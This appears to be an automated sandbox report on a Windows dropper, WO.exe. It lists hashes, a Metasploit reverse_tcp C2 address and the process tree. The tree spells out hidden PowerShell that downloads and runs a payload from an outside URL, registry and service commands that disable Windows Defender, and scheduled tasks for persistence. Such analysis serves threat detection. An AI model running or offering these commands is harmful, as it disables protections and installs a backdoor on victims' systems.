Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-12-2024 18:53

General

  • Target

    WO.exe

  • Size

    126KB

  • MD5

    7176b040816932541eb9c2b91d90b29b

  • SHA1

    137a9c4620366caff2a1d1c297b6ae8c6d28761d

  • SHA256

    db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95

  • SHA512

    1332645e8c6b53994b4f3f28b980c1fe646cec1771e77982a85ec4036725f4f2930bd9a45caea8a03b8a8ece0b432955b0d55e09396f5a80fd7c0d2825b0d1de

  • SSDEEP

    3072:a2sMWkzbJh1qZ9QW69hd1MMdxPe9N9uA0hu9TBfcX011:7bJhs7QW69hd1MMdxPe9N9uA0hu9TBZn

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

147.185.221.23:1121

Signatures

  • Disables service(s) 3 TTPs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Metasploit family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\WO.exe
    "C:\Users\Admin\AppData\Local\Temp\WO.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3096
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6CC4.tmp\6CC5.tmp\6CC6.bat C:\Users\Admin\AppData\Local\Temp\WO.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2276
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4964
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1100
      • C:\Users\Admin\AppData\Local\Temp\reddit.exe
        "C:\Users\Admin\AppData\Local\Temp\reddit.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2116
      • C:\Windows\system32\attrib.exe
        attrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"
        3⤵
        • Views/modifies file attributes
        PID:5104
      • C:\Windows\system32\schtasks.exe
        schtasks /query /TN "RunRedditLogon"
        3⤵
          PID:1612
        • C:\Windows\system32\schtasks.exe
          schtasks /create /tn "RunRedditLogon" /tr "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe" /sc onlogon /rl highest /f
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2004
        • C:\Windows\system32\schtasks.exe
          schtasks /query /TN "RunRedditMinute"
          3⤵
            PID:2400
          • C:\Windows\system32\schtasks.exe
            schtasks /create /tn "RunRedditMinute" /tr "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe" /sc minute /mo 1 /rl highest /f
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4804
          • C:\Windows\system32\sc.exe
            sc config WinDefend start= disabled
            3⤵
            • Launches sc.exe
            PID:232
          • C:\Windows\system32\net.exe
            net stop WinDefend
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4952
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop WinDefend
              4⤵
                PID:4776
            • C:\Windows\system32\reg.exe
              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
              3⤵
                PID:2864
              • C:\Windows\system32\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                3⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:3444
          • C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe
            C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe
            1⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2776
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4486.tmp\4487.tmp\4488.bat C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:3260
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                3⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3108
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"
                3⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4936
              • C:\Users\Admin\AppData\Local\Temp\reddit.exe
                "C:\Users\Admin\AppData\Local\Temp\reddit.exe"
                3⤵
                • Executes dropped EXE
                PID:1428
              • C:\Windows\system32\attrib.exe
                attrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"
                3⤵
                • Views/modifies file attributes
                PID:3908
              • C:\Windows\system32\schtasks.exe
                schtasks /query /TN "RunRedditLogon"
                3⤵
                  PID:2684
                • C:\Windows\system32\schtasks.exe
                  schtasks /query /TN "RunRedditMinute"
                  3⤵
                    PID:4884
                  • C:\Windows\system32\sc.exe
                    sc config WinDefend start= disabled
                    3⤵
                    • Launches sc.exe
                    PID:4036
                  • C:\Windows\system32\net.exe
                    net stop WinDefend
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1444
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 stop WinDefend
                      4⤵
                        PID:1452
                    • C:\Windows\system32\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                      3⤵
                        PID:1336
                      • C:\Windows\system32\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                        3⤵
                        • Modifies Windows Defender Real-time Protection settings
                        PID:4460
                  • C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe
                    C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe
                    1⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:2292
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2AFE.tmp\2AFF.tmp\2B00.bat C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2704
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                        3⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4184
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"
                        3⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4496
                      • C:\Users\Admin\AppData\Local\Temp\reddit.exe
                        "C:\Users\Admin\AppData\Local\Temp\reddit.exe"
                        3⤵
                        • Executes dropped EXE
                        PID:1352
                      • C:\Windows\system32\attrib.exe
                        attrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"
                        3⤵
                        • Views/modifies file attributes
                        PID:4356
                      • C:\Windows\system32\schtasks.exe
                        schtasks /query /TN "RunRedditLogon"
                        3⤵
                          PID:4428
                        • C:\Windows\system32\schtasks.exe
                          schtasks /query /TN "RunRedditMinute"
                          3⤵
                            PID:4900
                          • C:\Windows\system32\sc.exe
                            sc config WinDefend start= disabled
                            3⤵
                            • Launches sc.exe
                            PID:2700
                          • C:\Windows\system32\net.exe
                            net stop WinDefend
                            3⤵
                              PID:1548
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 stop WinDefend
                                4⤵
                                  PID:2696
                              • C:\Windows\system32\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                                3⤵
                                  PID:4144
                                • C:\Windows\system32\reg.exe
                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                                  3⤵
                                  • Modifies Windows Defender Real-time Protection settings
                                  PID:2888

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                              Filesize

                              2KB

                              MD5

                              d85ba6ff808d9e5444a4b369f5bc2730

                              SHA1

                              31aa9d96590fff6981b315e0b391b575e4c0804a

                              SHA256

                              84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                              SHA512

                              8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Filesize

                              944B

                              MD5

                              77d622bb1a5b250869a3238b9bc1402b

                              SHA1

                              d47f4003c2554b9dfc4c16f22460b331886b191b

                              SHA256

                              f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

                              SHA512

                              d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Filesize

                              1KB

                              MD5

                              52a0f7d389660fcf1555a48cb55d969f

                              SHA1

                              63080adf9a1516fea9a54fb27d323c967a9c6a2d

                              SHA256

                              20a4b42c49a9bc490683cee7c956e678fdfbaf60d0dc570a6aeaa0366dc2c9a0

                              SHA512

                              268903bc289d9441e40ff8dca45ec390fc474bf4a7a89a4af09d88225b4ebe78271938b91513ca1fb74c8c924b2a8b72271fa49cb73373f70fdaa28f38b2e0f1

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Filesize

                              944B

                              MD5

                              a66904fe28a9c28446e44f44e5ba034b

                              SHA1

                              d4277226b3b95b2f92dc745bda7096a98d4a9f26

                              SHA256

                              eb82b392f4cc90f4bb62e8d5d779a23ee0aa67832dcc8af94ce6099dd6cef8a7

                              SHA512

                              a873699317c8905a3171985b04f9aa15993224bf18dad3233254229e04deec7232eb9effa1f6f17a9ad525d33a65cc7bb0000d899c2ebcc8ab312be6d01081a1

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Filesize

                              1KB

                              MD5

                              c1cbb90689c246abb01ae2a93900e148

                              SHA1

                              675c4f6008805f6a4958b1a0f435fcb9603ca2a5

                              SHA256

                              90a401a84f4514e8d514450de21f9f4e802aff15d0d624567181dea18b0a495c

                              SHA512

                              e7e836be97922b165f0ade9d9ffd471bdd28c5b82eab75b02e054319174ea6e5a0893b5d53c0ea0827c784e464d4132f88100a1790573156c034a1c4dd8e64b9

                            • C:\Users\Admin\AppData\Local\Temp\6CC4.tmp\6CC5.tmp\6CC6.bat

                              Filesize

                              2KB

                              MD5

                              c0e9bc2dfff6e08df8196809b9bbf253

                              SHA1

                              006e88ea359145c40a6bbca55e6f21b387999255

                              SHA256

                              43c1dfafac6c340f420057606f317c2d0d3182c04f1a9c76b782f818c85f4f11

                              SHA512

                              5b0c012aca5479bf3b8852e1504465ccb2ad6ce4134ee8d2ad57c898fd91ac19f96a669ebc3a9201e65099ed1723f4515b48ca25ea21681ad45377ce3d9ca60c

                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uulas2n0.ukk.ps1

                              Filesize

                              60B

                              MD5

                              d17fe0a3f47be24a6453e9ef58c94641

                              SHA1

                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                              SHA256

                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                              SHA512

                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                            • C:\Users\Admin\AppData\Local\Temp\reddit.exe

                              Filesize

                              72KB

                              MD5

                              23544090c6d379e3eca7343c4f05d4d2

                              SHA1

                              c9250e363790a573e9921a68b7abe64f27e63df1

                              SHA256

                              b439d22ed2c1e1f83f3c52d1a7307d9aee8b516166ab221cb6d67b188cd80f56

                              SHA512

                              6aca78b0653e87ac80d7f562e6ab6d650f4d53d375cad043eb9613c7bbd642f7f82564a872b1b05520a77acbeba9da0540c4cd5a855a28a8188ebe3a4b57775c

                            • C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe

                              Filesize

                              126KB

                              MD5

                              7176b040816932541eb9c2b91d90b29b

                              SHA1

                              137a9c4620366caff2a1d1c297b6ae8c6d28761d

                              SHA256

                              db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95

                              SHA512

                              1332645e8c6b53994b4f3f28b980c1fe646cec1771e77982a85ec4036725f4f2930bd9a45caea8a03b8a8ece0b432955b0d55e09396f5a80fd7c0d2825b0d1de

                            • memory/1100-31-0x0000024F9F800000-0x0000024F9FA1C000-memory.dmp

                              Filesize

                              2.1MB

                            • memory/4964-17-0x00007FFBB9E70000-0x00007FFBBA931000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/4964-14-0x00007FFBB9E70000-0x00007FFBBA931000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/4964-13-0x00007FFBB9E70000-0x00007FFBBA931000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/4964-8-0x0000018771C10000-0x0000018771C32000-memory.dmp

                              Filesize

                              136KB

                            • memory/4964-2-0x00007FFBB9E73000-0x00007FFBB9E75000-memory.dmp

                              Filesize

                              8KB